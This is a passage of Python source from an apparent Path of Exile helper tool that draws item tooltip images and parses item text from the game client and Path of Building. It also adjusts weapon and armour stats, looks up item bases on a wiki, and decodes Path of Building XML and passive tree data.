if 'gem' not in poe_item.tags and poe_item.base != "Prophecy":
if poe_item.base not in poe_item.name:
cur.move_x((self.header_font.getsize(poe_item.base)[0] // 2) * -1)
d.text(cur.pos, poe_item.base, fill=fill, font=self.header_font)
cur.reset_x()
cur.y = 0
# transformed_namebar was assigned in the earlier non-PassiveSkill branch, so it is always bound here
cur.move_y(transformed_namebar.size[1])
else:
pass
for stat in stats:
if stat.title == "Separator":
self.last_action = "Separator"
cur.move_x((self.separator.size[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING + 2)
item.paste(self.separator, cur.pos)
cur.reset_x()
elif stat.title == "Elemental Damage:":
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
cur.move_x((self.font.getsize(stat_text)[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for element in stat.text.keys():
d.text(cur.pos, f" {stat.text[element]}", fill=ELE_COLOR[element], font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[element]}")[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Requires":
text = stat.title
for attr in stat.text.keys():
text += f" {attr.title()} {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
cur.move_y(0 if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for attr in stat.text.keys():
if attr == 'level':
d.text(cur.pos, f" {attr.title()}", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(f" {attr.title()}")[0])
attribute_final = f" {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font)
else:
d.text(cur.pos, f" {stat.text[attr]}", font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[attr]}")[0])
attribute_final = f" {attr.title()}{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font, fill=DESC_COLOR)
cur.move_x(self.font.getsize(attribute_final)[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
for line in stat.text:
text = line
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=stat.color, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
self.last_action = ""
else:
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=stat.color, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Image" and not isinstance(poe_item, PassiveSkill):
cur.move_x((stat.text.size[0] // 2) * -1)
cur.move_y(4)
ic = stat.text
if not isinstance(poe_item, Gem) and 'shaper' in poe_item.influences:
ic = Image.alpha_composite(self.shaper_backgrounds[poe_item.size].resize(ic.size), ic)
if not isinstance(poe_item, Gem) and 'elder' in poe_item.influences:
ic = Image.alpha_composite(self.elder_backgrounds[poe_item.size].resize(ic.size), ic)
item.alpha_composite(ic, cur.pos)
cur.move_y(stat.text.size[1])
cur.reset_x()
elif stat.title == "Image" and isinstance(poe_item, PassiveSkill):
ic = stat.text
if poe_item.asc_class:
frame = self.ascendancy_frame
elif poe_item.is_keystone:
frame = self.keystone_frame
elif poe_item.is_notable:
frame = self.notable_frame
else:
frame = self.passive_frame
icl = round(math.sqrt((frame.size[0] ** 2) / 2))
old_s = ic.size[0]
ic = ic.resize((icl, icl))
cur.move_x((ic.size[0] // 2) * -1)
cur.move_y(30)
item.alpha_composite(ic, cur.pos)
cur.move_y(((old_s + 26 - ic.size[0]) // 2) * -1)
cur.reset_x()
cur.move_x((frame.size[0] // 2) * -1)
item.alpha_composite(frame, cur.pos)
cur.move_y(frame.size[1])
cur.reset_x()
elif stat.title == "Stored Uses":
text = f"Can Store {stat.text} Use(s)"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, "Can Store ", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize("Can Store ")[0])
d.text(cur.pos, stat.text + " ", font=self.font)
cur.move_x(self.font.getsize(stat.text + " ")[0])
d.text(cur.pos, "Use(s)", fill=DESC_COLOR, font=self.font)
cur.reset_x()
elif stat.title == "Gem Help":
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=DESC_COLOR, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Seal Cost: ":
coin = Image.open(f'{_dir}//silver_coin.png').convert('RGBA')
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.title)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT + STAT_SPACING)
cur.reset_x()
sealtext = f"{stat.text}X Silver Coin"
cur.move_x((self.font.getsize(sealtext)[0] // 2) * -1)
d.text(cur.pos, f"{stat.text}X ", fill=NORMAL_COLOR, font=self.font)
cur.move_x(self.font.getsize(f"{stat.text}X ")[0])
item.alpha_composite(coin, cur.pos)
cur.move_x(coin.size[0] + 2)
d.text(cur.pos, "Silver Coin", fill=NORMAL_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
else:
text = f"{stat.title}{stat.text}"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
if ':' in stat.title:
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
d.text(cur.pos, str(stat.text), fill=stat.color, font=self.font)
else:
if stat.title.startswith('{'):
color = CRAFTED
else:
color = stat.color
d.text(cur.pos, stat.title, fill=color, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
item = ImageOps.expand(item, border=1, fill=fill)
return item
def parse_game_item(itemtext):
item = itemtext.split('\n')
groups = []
curr_group = []
for line in item:
if "---" in line:
groups.append(curr_group)
curr_group = []
else:
curr_group.append(line)
groups.append(curr_group)
pobitem = {'name': '', 'special': [], 'enchant': [],
'implicit': [], 'stats': [], 'quality': 0, 'type': "game"}
unmarked_blocks = 0
print(item, groups)
for group in groups:
if group[0].startswith('Rarity:'):
pobitem['rarity'] = group[0].split(' ')[1].title()
pobitem['base'] = group[len(group)-1]
if 'Superior' in pobitem['base']:
pobitem['base'] = pobitem['base'].replace('Superior ', '')
if 'Synthesised' in pobitem['base']:
# is there a special nature for Synthesised items?
# if yes: pobitem['special'].append('Synthesised Item')
pobitem['base'] = pobitem['base'].replace('Synthesised', '')
if len(group) > 2:
pobitem['name'] = group[1]
# defense
elif ( group[0].startswith('Quality') or
group[0].startswith('Map Tier:') or
group[0].startswith('Chance to Block:') or
group[0].startswith('Armour:') or
group[0].startswith('Evasion Rating:') or
group[0].startswith('Energy Shield:')):
for line in group:
if line.startswith('Quality:'):
pobitem['quality'] = line.replace('Quality: +', '').replace('% (augmented)', '')
elif ( line.startswith('Map Tier:') or
line.startswith('Item Quantity:') or
line.startswith('Item Rarity:') or
line.startswith('Monster Pack Size:') or
line.startswith('Atlas Region:')): # map stuff
pobitem['implicit'].append(line)
elif line.startswith('Quality ('): # catalysts
pobitem['implicit'].append(line)
# offense
elif group[len(group)-1].startswith('Attacks per Second:') or group[len(group)-1].startswith('Weapon Range:'):
# this filter is not trivial and not fully tested, due to large differences in weapon types and unique exceptions
# trivial solution would be to check for every weapon type in the game
pass
elif group[0].startswith('Requirements:'):
pass
elif group[0].startswith('Sockets:'):
pass
elif group[0].startswith('Item Level:'):
pass
elif group[0].startswith('Price:'):
pass
elif group[0].endswith('(enchant)'):
for line in group:
pobitem['enchant'].append(line.replace('(enchant)', ''))
elif group[0].endswith('(implicit)'):
for line in group:
pobitem['implicit'].append(line.replace('(implicit)', ''))
elif group[0].startswith('Corrupted'):
# should corrupted be an explicit?
pobitem['stats'].append('Corrupted')
elif group[0].endswith(' Item'):
for line in group:
pobitem['special'].append(line)
else: # unid is an explicit
# if (groups.index(group) < len(group)-1) or len(pobitem['stats']) == 0:
if (unmarked_blocks == 0):
unmarked_blocks += 1
print("appending stats")
for line in group:
print(line)
pobitem['stats'].append(line)
else: # flavor
pass
print(pobitem)
return {
'name': pobitem['name'], 'base': pobitem['base'], 'stats': pobitem['stats'], 'rarity': pobitem['rarity'],
'implicits': pobitem['implicit'], 'quality': pobitem['quality'], 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
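# parse_game_item() expects item text as copied from the game client:
# blocks separated by "---" lines, e.g. (abridged; names and values
# illustrative):
# Rarity: Rare
# Storm Visage
# Hubris Circlet
# ---
# Quality: +20% (augmented)
# Energy Shield: 120
# ---
# +50 to maximum Life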
def parse_pob_item(itemtext):
if "Implicits: " not in itemtext:
print("not in")
return parse_game_item(itemtext)
item = itemtext.split('\n')
item = [line for line in item if "---" not in line]
qualtext = 0
variant = None
pobitem = {'special': [], 'enchant': "", 'type': None}
for index, line in enumerate(item):
if "{variant:" in line:
variant_now = line[line.index("t:") + 2:line.index("}")].split(',')
if variant not in variant_now:
item.pop(index)
continue
line = item[index] = line.split("}", 1)[1]
if "{range:" in line:
try:
percent = float(line[line.index("e:") + 2:line.index("}")])
except Exception:
percent = 1.0  # malformed {range:...} tag; assume the full roll
txt = line.split("}")[1]
matches = re_range.findall(txt)
for match in matches:
stat = match[1:-1]
if " to " in stat:
separator = stat.find(' to ', 1)
range_end = stat[separator + 4:]
else:
separator = stat.find('-', 1)
range_end = stat[separator + 1:]
range_start = stat[:separator]
if '.' in range_start or '.' in range_end:
calc_stat = float(percent * float(range_end))
else:
calc_stat = int(percent * float(range_end))
txt = txt.replace(match, str(calc_stat))
item[index] = txt
if line.startswith("Rarity"):
pobitem['rarity'] = line.split(' ')[1].title()
pobitem['rarity_index'] = index
continue
elif line.startswith("Selected Variant"):
variant = line.split(": ")[1]
continue
# elif line.startswith("Item Level"):
# pobitem['type'] = "game"
# if item[index + 3].startswith('--'):
# offset = 2
# if "(implicit)" not in item[index + offset]:
# pobitem['enchant'] = item[index + offset]
# offset = 4
# if "(implicit)" in item[index + offset]:
# pobitem['implicits'] = 0
# for line_inner in item[index + offset:]:
# print(line_inner)
# if "(implicit)" in line_inner:
# pobitem['implicits'] = pobitem['implicits'] + 1
# if "---" in line_inner:
# break
# pobitem['statstart_index'] = index + offset + pobitem['implicits']
# else:
# pobitem['statstart_index'] = index + offset
# else:
# pobitem['statstart_index'] = index + 2
elif line.startswith("====="):
pobitem['statstart_index'] = index
elif line.startswith("Implicits:") and 'implicits' not in pobitem:
pobitem['type'] = 'pob'
pobitem['implicits'] = int(line.split(': ')[1])
pobitem['statstart_index'] = index + pobitem['implicits']
elif "(enchant)" in line or "(implicit)" in line:
if 'implicits' not in pobitem:
pobitem['implicits'] = 1
else:
pobitem['implicits'] = pobitem['implicits'] + 1
pobitem['statstart_index'] = index
elif line.startswith("Requires"):
pobitem['statstart_index'] = index
elif line.startswith("Quality"):
try:
qualtext = line.split("+")[1].split(' ')[0].strip('%')
except IndexError:
pass
if "Shaper Item" in line:
pobitem['special'].append("Shaper Item")
if "Elder Item" in line:
pobitem['special'].append("Elder Item")
if "Crusader Item" in line:
pobitem['special'].append("Crusader Item")
if "Redeemer Item" in line:
pobitem['special'].append("Redeemer Item")
if "Warlord Item" in line:
pobitem['special'].append("Warlord Item")
if "Hunter Item" in line:
pobitem['special'].append("Hunter Item")
if pobitem['rarity'].lower() in ['unique', 'rare', 'relic']:
name = item[pobitem['rarity_index'] + 1]
base = item[pobitem['rarity_index'] + 2]
elif pobitem['rarity'].lower() == 'magic':
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = get_base_from_magic(name)
else:
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = name
if 'implicits' in pobitem and pobitem['implicits']:
if pobitem['type'] == 'game':
offset = 0
else:
offset = 1
implicits = item[:pobitem['statstart_index'] + offset][-1 * pobitem['implicits']:]
implicits = [implicit.replace('(implicit)', '') for implicit in implicits]
elif item[pobitem['statstart_index'] - 2].startswith('--') and 'Item Level' not in item[pobitem['statstart_index'] - 1]:
imp_end = "None"
for ind, stat in enumerate(item[pobitem['statstart_index'] - 1:]):
if stat.startswith('--'):
if item[pobitem['statstart_index'] - 1:][ind + 1] not in ['Shaper Item', 'Elder Item']:
imp_end = ind - 1
break
if imp_end != "None":
implicits = item[pobitem['statstart_index'] - 1:][0:imp_end]
else:
implicits = []
else:
implicits = []
stat_text = item[pobitem['statstart_index'] + 1:]
stat_text = [stat for stat in stat_text if not stat.startswith('--')
and not ":" in stat and stat]
if '(' in base and ')' in base:
base = base[:base.find('(') - 1]
if "Synthesised" in base:
base = base.replace("Synthesised", "").strip()
if "Synthesised" in name:
name = name.replace("Synthesised", "").strip()
print(implicits, stat_text)
return {
'name': name, 'base': base, 'stats': stat_text, 'rarity': pobitem['rarity'],
'implicits': implicits, 'quality': int(qualtext), 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
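# parse_pob_item() handles text exported by Path of Building, which carries
# an explicit implicit count, e.g. (abridged; names and values illustrative):
# Rarity: UNIQUE
# Ichimonji
# Corsair Sword
# Implicits: 1
# 40% increased Global Accuracy Rating
# +10 to Strength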
def ensure_rangeless(stat):
if "-" in str(stat):
return stat.split('-')[0][1:]
return stat
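# e.g. ensure_rangeless("(10-20)") -> "10": keeps the low end of a rolled
# range, dropping the opening parenthesis; plain values pass through
# unchanged.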
def modify_base_stats(item):
stats = {
'flat es': 0, 'flat armour': 0, 'flat evasion': 0, 'inc es': int(item.quality),
'inc armour': int(item.quality), 'inc evasion': int(item.quality), 'aspd': 0,
'fire low': 0, 'fire max': 0, 'fire inc': 0, 'cold low': 0, 'cold max': 0,
'cold inc': 0, 'light low': 0, 'light max': 0, 'light inc': 0, 'chaos low': 0,
'chaos max': 0, 'chaos inc': 0, 'phys low': 0, 'phys max': 0, 'phys inc': int(item.quality),
'cc': 0, 'range': 0, 'block': 0
}
print(item.implicits, item.explicits)
if item.implicits:
for stat in unescape_to_list(item.implicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'spell damage' not in text and 'block recovery' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if text.lower().endswith("critical strike chance") and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if item.explicits:
for stat in unescape_to_list(item.explicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text \
and "maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if text.lower().endswith("critical strike chance") and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if 'weapon' in item.tags:
if stats['aspd']:
_as = float(ensure_rangeless(item.attack_speed))
item.attack_speed = f"{(_as + (stats['aspd'] / 100) * _as):.2}"
if stats['cc']:
print(item.critical_chance.split("%")[0], stats['cc'])
try:
cc = float(item.critical_chance.split("%")[0])
except Exception:
cc = 5.0
cc += cc * (stats['cc'] / 100)
item.critical_chance = f"{cc:.2}%"
if stats['range']:
i_range = int(ensure_rangeless(item.range))
i_range += stats['range']
item.range = f"{i_range}"
if stats['fire max'] or stats['fire inc']:
if stats['fire max']:
item.fire_min = stats['fire low']
item.fire_max = stats['fire max']
fire_m = int(ensure_rangeless(item.fire_min))
fire_mx = int(ensure_rangeless(item.fire_max))
fire_m += fire_m * (stats['fire inc'] / 100)
fire_mx += fire_mx * (stats['fire inc'] / 100)
item.fire_min = str(round(fire_m))
item.fire_max = str(round(fire_mx))
if stats['cold max'] or stats['cold inc']:
if stats['cold max']:
item.cold_min = stats['cold low']
item.cold_max = stats['cold max']
cold_m = int(ensure_rangeless(item.cold_min))
cold_mx = int(ensure_rangeless(item.cold_max))
cold_m += cold_m * (stats['cold inc'] / 100)
cold_mx += cold_mx * (stats['cold inc'] / 100)
item.cold_min = str(round(cold_m))
item.cold_max = str(round(cold_mx))
if stats['light max'] or stats['light inc']:
if stats['light max']:
item.lightning_min = stats['light low']
item.lightning_max = stats['light max']
lightning_m = int(ensure_rangeless(item.lightning_min))
lightning_mx = int(ensure_rangeless(item.lightning_max))
lightning_m += lightning_m * (stats['light inc'] / 100)
lightning_mx += lightning_mx * (stats['light inc'] / 100)
item.lightning_min = str(round(lightning_m))
item.lightning_max = str(round(lightning_mx))
if stats['chaos max'] or stats['chaos inc']:
if stats['chaos max']:
item.chaos_min = stats['chaos low']
item.chaos_max = stats['chaos max']
chaos_m = int(ensure_rangeless(item.chaos_min))
chaos_mx = int(ensure_rangeless(item.chaos_max))
chaos_m += chaos_m * (stats['chaos inc'] / 100)
chaos_mx += chaos_mx * (stats['chaos inc'] / 100)
item.chaos_min = str(round(chaos_m))
item.chaos_max = str(round(chaos_mx))
if stats['phys max'] or stats['phys inc']:
physical_m = int(ensure_rangeless(item.physical_min)) + stats['phys low']
physical_mx = int(ensure_rangeless(item.physical_max)) + stats['phys max']
physical_m += physical_m * (stats['phys inc'] / 100)
physical_mx += physical_mx * (stats['phys inc'] / 100)
item.physical_min = str(round(physical_m))
item.physical_max = str(round(physical_mx))
else:
try:
if item.armour:
arm = int(ensure_rangeless(item.armour))
arm += stats['flat armour']
arm += (stats['inc armour'] / 100) * arm
item.armour = str(round(arm))
except Exception:
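# assumption: a base without an `armour` attribute is not an Armour piece,
# so there is nothing to scale and we bail out entirely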
return
if item.evasion:
ev = int(ensure_rangeless(item.evasion))
ev += stats['flat evasion']
ev += (stats['inc evasion'] / 100) * ev
item.evasion = str(round(ev))
if item.energy_shield:
es = int(ensure_rangeless(item.energy_shield))
es += stats['flat es']
es += (stats['inc es'] / 100) * es
item.energy_shield = str(round(es))
if "shield" in item.tags:
block = int(ensure_rangeless(item.block))
block += stats['block']
item.block = str(round(block))
def _get_wiki_base(item, object_dict, cl, slot, char_api=False, thread_exc_queue=None):
try:
assert item['rarity'].lower()
except Exception:
item['rarity'] = 'Normal' # assumed fallback so the rarity lookups below cannot crash
if item['rarity'].lower() in ['unique', 'relic'] and char_api:
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = item.get('attack_speed', 0)
wiki_base.chaos_min = item.get('chaos_min', 0)
wiki_base.chaos_max = item.get('chaos_max', 0)
wiki_base.cold_min = item.get('cold_min', 0)
wiki_base.cold_max = item.get('cold_max', 0)
wiki_base.fire_min = item.get('fire_min', 0)
wiki_base.fire_max = item.get('fire_max', 0)
wiki_base.lightning_min = item.get('lightning_min', 0)
wiki_base.lightning_max = item.get('lightning_max', 0)
wiki_base.physical_min = item.get('physical_min', 0)
wiki_base.physical_max = item.get('physical_max', 0)
wiki_base.range = item.get('range', 0)
wiki_base.critical_chance = item.get('critical_chance', 0)
elif isinstance(wiki_base, Armour):
wiki_base.armour = item.get('armour', 0)
wiki_base.evasion = item.get('evasion', 0)
wiki_base.energy_shield = item.get('energy_shield', 0)
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif item['rarity'].lower() in ['unique', 'relic']:
real_base = cl.find_items({'name': item['base']})[0]
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
wiki_base = real_base
wiki_base.implicits = item['implicits']
wiki_base.explicits = item['stats']
wiki_base.name = item['name']
wiki_base.base = item['base']
wiki_base.rarity = item['rarity']
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = real_base.attack_speed
wiki_base.chaos_min = real_base.chaos_min
wiki_base.chaos_max = real_base.chaos_max
wiki_base.cold_min = real_base.cold_min
wiki_base.cold_max = real_base.cold_max
wiki_base.fire_min = real_base.fire_min
wiki_base.fire_max = real_base.fire_max
wiki_base.lightning_min = real_base.lightning_min
wiki_base.lightning_max = real_base.lightning_max
if real_base.physical_min > wiki_base.physical_min:
wiki_base.physical_min = real_base.physical_min
if real_base.physical_max > wiki_base.physical_max:
wiki_base.physical_max = real_base.physical_max
wiki_base.range = real_base.range
wiki_base.critical_chance = real_base.critical_chance
elif isinstance(wiki_base, Armour):
wiki_base.armour = real_base.armour
wiki_base.evasion = real_base.evasion
wiki_base.energy_shield = real_base.energy_shield
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif "Flask" in item['base']:
return
else:
if item['rarity'].lower() == 'magic' and item['name'] == item['base']:
if '' in item['stats']:
item['stats'].remove('')
item['base'] = get_base_from_magic(item['base'])
wl = []
for w in item['base'].split(' '):
if not any(char.isdigit() for char in w):
wl.append(w)
try:
wiki_base = cl.find_items({'name': ' '.join(wl).replace("Synthesised", "").strip()})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
wiki_base.rarity = item['rarity']
wiki_base.name = item['name']
wiki_base.base = item['base']
if char_api:
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['explicits']:
wiki_base.explicits = '<br>'.join(item['explicits'])
else:
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['stats']:
wiki_base.explicits = '<br>'.join(item['stats'])
if item['enchant']:
wiki_base.enchant = item['enchant']
wiki_base.quality = item['quality']
if (wiki_base.rarity.lower() not in ['unique', 'relic'] and char_api) or char_api is False:
skip_tags = ("ring", "amulet", "belt", "quiver", "flask", "jewel")
if wiki_base.quality != '' and not any(t in wiki_base.tags for t in skip_tags):
modify_base_stats(wiki_base)
if item['special']:
for influence in item['special']:
if influence == "Shaper Item":
wiki_base.influences.append("shaper")
elif influence == "Elder Item":
wiki_base.influences.append("elder")
elif influence == "Redeemer Item":
wiki_base.influences.append("redeemer")
elif influence == "Crusader Item":
wiki_base.influences.append("crusader")
elif influence == "Warlord Item":
wiki_base.influences.append("warlord")
elif influence == "Hunter Item":
wiki_base.influences.append("hunter")
object_dict[slot] = wiki_base
def parse_pob_xml(xml: str, cl=None):
tree = Etree.ElementTree(Etree.fromstring(xml))
equipped = {}
slots = tree.findall('Items/Slot')
for slot in slots:
if 'socket' in slot.attrib['name'].lower():
continue
equipped[slot.attrib['name']] = {}
equipped[slot.attrib['name']]['id'] = slot.attrib['itemId']
if cl:
obj_dict = {}
threads = []
exc_queue = Queue()
for slot in equipped:
item_id = equipped[slot]['id']
tree_item = tree.find(f'Items/Item[@id="{item_id}"]')
if 'variant' in tree_item.attrib:
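# Path of Building items can embed several variants in one block; drop the
# {variant:...} lines that do not match the active variant before parsing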
lines = tree_item.text.replace('\t', '').split('\n')
for line in lines[:]:
if line.startswith('{variant'):
variant = line.split('variant:')[1][0]
if variant != tree_item.attrib['variant']:
lines.remove(line)
tree_item.text = '\n'.join(lines)
equipped[slot]['raw'] = tree_item.text.replace('\t', '')
try:
equipped[slot]['parsed'] = parse_pob_item(equipped[slot]['raw'])
except Exception:
continue
item = equipped[slot]['parsed']
t = threading.Thread(target=_get_wiki_base, args=(item, obj_dict, cl, slot, False, exc_queue)) # forward exc_queue so worker failures surface in the check below
threads.append(t)
t.start()
for thread in threads:
thread.join()
if not exc_queue.empty():
raise exc_queue.get()
for slot in obj_dict:
equipped[slot]['object'] = obj_dict[slot]
skill_slots = tree.findall('Skills/Skill')
for skill in skill_slots:
if 'slot' in skill.attrib:
slot = skill.attrib['slot']
if slot in equipped:
equipped[slot]['gems'] = []
lst = equipped[slot]['gems']
else:
continue
else:
if 'gem_groups' not in equipped:
equipped['gem_groups'] = {}
try:
if list(skill)[0].attrib['nameSpec'] not in equipped['gem_groups']:
equipped['gem_groups'][list(skill)[0].attrib['nameSpec']] = []
except Exception:
continue
lst = equipped['gem_groups'][list(skill)[0].attrib['nameSpec']]
gems = list(skill)
for gem in gems:
gem_d = {
'name': gem.attrib['nameSpec'],
'level': gem.attrib['level'],
'enabled': gem.attrib['enabled'],
'quality': gem.attrib['quality']
}
lst.append(gem_d)
stats = {}
active_spec = int(tree.find('Tree').attrib['activeSpec']) - 1
current_tree = tree.findall('Tree/Spec')[active_spec]
tree_base64 = current_tree.find('URL').text.replace('\t', '').replace('\n', '').rsplit('/', 1)[1]
byte_tree = binascii.a2b_base64(tree_base64.replace('-', '+').replace('_', '/'))
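# Decoded tree layout (mirrors the encoder in poe_skill_tree below):
# 7 header bytes (4-byte version, class, ascendancy, pad byte), then one
# 2-byte big-endian node id per allocated passive point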
pos = 7
total_nodes = (len(byte_tree) - 7) // 2
nodes = []
for _ in range(total_nodes):
nodes.append(str(int.from_bytes(byte_tree[pos:pos + 2], byteorder='big')))
pos += 2
stats['keystones'] = []
stats['asc_nodes'] = []
for node in nodes:
if node in keystones:
stats['keystones'].append(keystones[node])
if node in asc_nodes:
stats['asc_nodes'].append(asc_nodes[node])
stats['trees'] = {}
for spec in tree.findall('Tree/Spec'):
name = spec.attrib['title'] if 'title' in spec.attrib else 'Default'
stats['trees'][name] = spec.find('URL').text.replace('\t', '').replace('\n', '').replace('/passive', '/fullscreen-passive')
stats['jewels'] = []
jewel_sockets = current_tree.findall('Sockets/Socket')
